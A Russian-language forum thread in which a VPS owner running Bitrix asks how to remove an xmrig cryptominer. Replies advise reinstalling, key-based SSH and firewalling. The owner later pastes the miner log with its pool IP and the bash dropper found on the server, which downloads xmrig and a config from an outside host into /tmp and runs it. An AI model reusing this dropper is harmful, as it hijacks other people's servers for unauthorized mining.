xmrig удалить

0

1

Добрый день, имеется VPS в аренде на котором крутится битрикс вевб окружени, сегодня подключился и обнаружил загруженные на 100% процессоры. Процессор что грузит xmrig. Почитал что это вирус. 22 порт был изменен на не стандартный. Пароль root тоже сложный. Как его удалить что бы не переустанавливать систему?

Ссылка

←	Удалить софт рейд с сохранением данных

Программа телеперадач (канал Культура) на неделю в виде таблички для печати?

→

xmrig

Судя по гуглу, это не вирус, а майнер. Просто прибей процесс. А дальше смотри, будет ли он грузиться после ребута.

Zhbert ★★★★★
(17.12.21 12:00:06 MSK)

Ответ на: комментарий от Zhbert 17.12.21 12:00:06 MSK

сейчас попробую, попробовал копии по ssh вытянуть, обрыв связи, через putty без проблем сижу. Подключил вени так копии сливаю

kot488
(17.12.21 12:04:54 MSK) автор топика

Ссылка

Какая аутентификация? Пароль или ключи?

~~chenbr0~~ ☆
(17.12.21 12:07:06 MSK)

Ответ на: комментарий от chenbr0 17.12.21 12:07:06 MSK

пасс

kot488
(17.12.21 12:10:58 MSK) автор топика

Ответ на: комментарий от kot488 17.12.21 12:10:58 MSK

пасс

Ай-яй-яй. Впрочем, возможно, не пароль подобрали, а какую-то дыру попользовали, так что смена на ключи может не помочь.

Nervous ★★★★★
(17.12.21 12:20:17 MSK)

Ответ на: комментарий от Nervous 17.12.21 12:20:17 MSK

Переустанавливать все с другим паролем?

kot488
(17.12.21 12:22:20 MSK) автор топика

Ответ на: комментарий от kot488 17.12.21 12:22:20 MSK

Я бы все перенакотил, обновил и сделал логин по ключам.

Nervous ★★★★★
(17.12.21 12:23:30 MSK)

Ответ на: комментарий от Nervous 17.12.21 12:23:30 MSK

и не ставил битрикс

Anoxemian ★★★★★
(17.12.21 12:31:08 MSK)

Ответ на: комментарий от Anoxemian 17.12.21 12:31:08 MSK

Чего? Вроде все с коробки хорошо настроено

kot488
(17.12.21 12:32:04 MSK) автор топика

Ответ на: комментарий от kot488 17.12.21 12:32:04 MSK

а еще нанял бы специалиста по деплою битрикса

Anoxemian ★★★★★
(17.12.21 12:32:40 MSK)

Ссылка

killall -9 xmrig

ZenitharChampion ★★★★★
(17.12.21 12:33:03 MSK)

Ответ на: комментарий от Nervous 17.12.21 12:23:30 MSK

Моё сообщение удалили почему-то по причине «флуд», а оно таковым не было. Я там написал что его всё равно опять взломают и что он может не париться. Объясню: если он сделает такую же установку как раньше - то и итог будет такой же.

Удалять «вирус» из рабочей системы это вообще верх глупости, система скомпрометирована и неизвестно что в ней ещё могли поменять.

Переустанавливать систему на другую точно такую же - лучше, но не спасёт, его взломают через ту же дыру что и в первый раз. И дело не в пароле/ключе (он же написал что пароль был сложный, а сложные пароли не подбираются).

Правильно - надо провести исследование, выяснить как именно был получен доступ и закрыть этот способ. Но он этого делать, очевидно, не будет. Поэтому остаётся только вариант забить.

firkax ★★★★★
(17.12.21 12:34:31 MSK)

Ответ на: комментарий от firkax 17.12.21 12:34:31 MSK

копать когда был создан файлик который запустил процес?

kot488
(17.12.21 12:38:07 MSK) автор топика

Ссылка

Ответ на: комментарий от ZenitharChampion 17.12.21 12:33:03 MSK

убил процесс, сделал ребут, пока нет в запусках

kot488
(17.12.21 12:41:15 MSK) автор топика

Ссылка

Ответ на: комментарий от firkax 17.12.21 12:34:31 MSK

Ранее 3 года пока машина стояла за натом все было ок, сейчас шнур инета втыкнул на прямую, и словил

kot488
(17.12.21 12:41:50 MSK) автор топика

Ответ на: комментарий от firkax 17.12.21 12:34:31 MSK

Дырка где то в битрикс, от его имени запущен был процес

kot488
(17.12.21 14:49:07 MSK) автор топика

Ответ на: комментарий от kot488 17.12.21 14:49:07 MSK

За более чем 3 года битрикс хоть раз обновлялся?

~~zemidius~~ ★
(18.12.21 01:04:14 MSK)

Ссылка

Ответ на: комментарий от kot488 17.12.21 12:41:50 MSK

Значит нужно настроить nftables - оставить открытыми только необходимые порты, чтобы всякая гадость не лезла. Ну и плюс аутентификацию по ssh ключам, как советовал человек выше.

trickybestia
(18.12.21 19:32:10 MSK)

Ответ на: комментарий от trickybestia 18.12.21 19:32:10 MSK

Отрык только 80 443 и измененный порт для ssh

kot488
(20.12.21 12:37:37 MSK) автор топика

Ответ на: комментарий от kot488 20.12.21 12:37:37 MSK

измененный порт для ssh

От целевой атаки (nmap) это не спасёт.

От глобального поиска уязвимых ресурсов скорее да, но не факт

IIIypuk ★★★
(20.12.21 12:46:34 MSK)

Ответ на: комментарий от kot488 20.12.21 12:37:37 MSK

Значит, скорее всего, битрикс ваш хекнули. Чтобы избежать такого в будущем, можете попробовать настроить SELinux или хотя бы AppArmor.

trickybestia
(20.12.21 12:49:04 MSK)

Ссылка

Ответ на: комментарий от IIIypuk 20.12.21 12:46:34 MSK

Ну, у ТСа же «сложный» ssh-пароль.

trickybestia
(20.12.21 12:50:10 MSK)

27 января 2022 г.

Ответ на: комментарий от trickybestia 20.12.21 12:50:10 MSK

Вообщем по началу удаление скрипта помогало, на неделю, потом опять вредитель запускался. Пароли пробовал менять не помогае. В tmp были файлы xmrig и config.json. Ограничел доступа по ssh только с определенных IP.

Вот кусок лога который лога

ABOUT XMRig/6.16.2 gcc/9.3.0
LIBS libuv/1.42.0 OpenSSL/1.1.1l hwloc/2.5.0
HUGE PAGES supported
1GB PAGES disabled
CPU Intel(R) Xeon(R) CPU E3-1225 v5 @ 3.30GHz (1) 64-bit AES L2:1.0 MB L3:8.0 MB 4C/4T NUMA:1
MEMORY 13.1/15.4 GB (85%)
DONATE 1%
ASSEMBLY auto:intel
POOL #1 193.29.56.190:443 algo auto
POOL #2 193.29.56.190:3333 algo auto
COMMANDS hashrate, pause, resume, results, connection [2022-01-22 20:10:41.043] config configuration saved to: «/tmp/config.json» [2022-01-22 20:10:41.149] net use pool 193.29.56.190:443 TLSv1.3 193.29.56.190 [2022-01-22 20:10:41.149] net fingerprint (SHA-256): «506847d9aff6c44cae3744081278ffee45cf4f372a86e490eb816209ecd52f19» [2022-01-22 20:10:41.149] net new job from 193.29.56.190:443 diff 5256K algo rx/0 height 2542932 (14 tx) [2022-01-22 20:10:41.149] cpu use argon2 implementation AVX2 [2022-01-22 20:10:41.167] msr cannot read MSR 0x000001a4 [2022-01-22 20:10:41.167] msr FAILED TO APPLY MSR MOD, HASHRATE WILL BE LOW [2022-01-22 20:10:41.167] randomx init dataset algo rx/0 (4 threads) seed bfeb43ae90807dc3… [2022-01-22 20:10:41.185] randomx allocated 2336 MB (2080+256) huge pages 11% 128/1168 +JIT (18 ms) [2022-01-22 20:10:46.004] randomx dataset ready (4820 ms) [2022-01-22 20:10:46.005] cpu use profile rx (4 threads) scratchpad 2048 KB [2022-01-22 20:10:46.007] cpu READY threads 4/4 (4) huge pages 100% 4/4 memory 8192 KB (2 ms) [2022-01-22 20:10:59.198] net new job from 193.29.56.190:443 diff 5256K algo rx/0 height 2542933 (18 tx) [2022-01-22 20:11:31.030] net new job from 193.29.56.190:443 diff 5256K algo rx/0 height 2542934 (12 tx) [2022-01-22 20:11:37.396] net new job from 193.29.56.190:443 diff 5289K algo rx/0 height 2542935 (4 tx) [2022-01-22 20:11:42.695] net new job from 193.29.56.190:443 diff 5289K algo rx/0 height 2542936 (4 tx) [2022-01-22 20:11:46.060] miner speed 10s/60s/15m 1479.1 n/a n/a H/s max 1491.6 H/s [2022-01-22 20:12:46.109] miner speed 10s/60s/15m 1463.9 1462.4 n/a H/s max 1491.6 H/s [2022-01-22 20:13:46.169] miner speed 10s/60s/15m 1491.8 1468.5 n/a H/s max 1491.8 H/s [2022-01-22 20:14:46.229] miner speed 10s/60s/15m 1479.5 1464.3 n/a H/s max 1491.8 H/s [2022-01-22 20:14:46.865] net new job from 193.29.56.190:443 diff 5256K algo rx/0 height 2542937 (18 tx) [2022-01-22 20:15:46.229] miner speed 10s/60s/15m 1463.6 1450.9 n/a H/s max 1491.8 H/s [2022-01-22 20:16:46.289] miner speed 10s/60s/15m 1460.0 1472.3 n/a H/s max 1491.8 H/s

А вот пошоже нашел запуск файла #!/bin/bash if [ -f /tmp/xmrig -a -f /tmp/config.json ]; then

    echo "xmrig&config.json status yes"

else
    cd /tmp
    wget -P /tmp [url]https://github.com/xmrig/xmrig/releases/download/v6.16.2/xmrig-6.16.2-linux-static-x64.tar.gz[/url]
    curl -o /tmp/config.json [url]https://cdn.sql.gg/TiWRtJXktxmJnpUYVIeCfd7ukmSHkKTc/config.json[/url]
    tar -zxvf /tmp/xmrig-6.16.2-linux-static-x64.tar.gz
    mv /tmp/xmrig-6.16.2/xmrig /tmp/xmrig
    chmod 777 /tmp/xmrig
    rm -rf /tmp/xmrig-6.16.2
    rm -rf /tmp/xmrig-6.16.2-linux-static-x64.tar.gz
    echo "xmrig&config.json status no loading"

ps -fe|grep ./xmrig |grep -v grep if [ $? -ne 0 ] then echo «start process…..» cd /tmp ./xmrig else echo «runing…..» fi

Пока в хосте прописал левый IP для github.com и cdn.sql.gg и снес файлы которыми запускался процесс

В cron запускали задачи по дампу БД от пользователя bitrix. Но что интересно, пользователю пасс менял а залогинеться под ним не могу, но не смотрел возможно у него доступ по ssh закрыт. Эти файлы видел но не предал значение, думал это как раз бакап битрикса

kot488
(27.01.22 08:42:41 MSK) автор топика
Последнее исправление: kot488 27.01.22 08:45:58 MSK (всего исправлений: 1)

Ответ на: комментарий от kot488 27.01.22 08:42:41 MSK

ты не понимаешь элементарного
если твою тачку порутали, то могут запросто менять дату создания файла (man touch), владельца файла (man chown), создавать невидимые файлы (не те, которые с точечкой, а те, которые драйвер ФС не видит), скрывать своё присутствие в /etc/passwd и тд и тп
проще говоря, удаляя файлы из /tmp, ты просто отрубаешь голову змей горынычу, а потом на её месте вырастает новых две

anonymous
(27.01.22 17:35:38 MSK)

Ответ на: комментарий от anonymous 27.01.22 17:35:38 MSK

Так я нашел откуда что запускалось. И удалил. пока полет нормальный

kot488
(28.01.22 12:48:49 MSK) автор топика

Ответ на: комментарий от kot488 28.01.22 12:48:49 MSK

Так что удалил?

anonymous
(28.01.22 19:11:56 MSK)

27 февраля 2022 г.

Ответ на: комментарий от anonymous 28.01.22 19:11:56 MSK

Файл по пути «/home/bitrix/sql_backup.sql», там вирусный скрипт.

MMelnikov_Bewave
(27.02.22 22:18:28 MSK)

Ссылка

Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.

←	Удалить софт рейд с сохранением данных

General

Программа телеперадач (канал Культура) на неделю в виде таблички для печати?

→

Похожие темы